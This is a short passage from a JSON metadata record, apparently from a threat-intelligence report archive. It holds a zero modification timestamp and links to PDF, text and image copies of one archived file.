	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4a0987254e47430711cf583ecfc826c17549d218.pdf",
		"text": "https://archive.orkl.eu/4a0987254e47430711cf583ecfc826c17549d218.txt",
		"img": "https://archive.orkl.eu/4a0987254e47430711cf583ecfc826c17549d218.jpg"
	}
}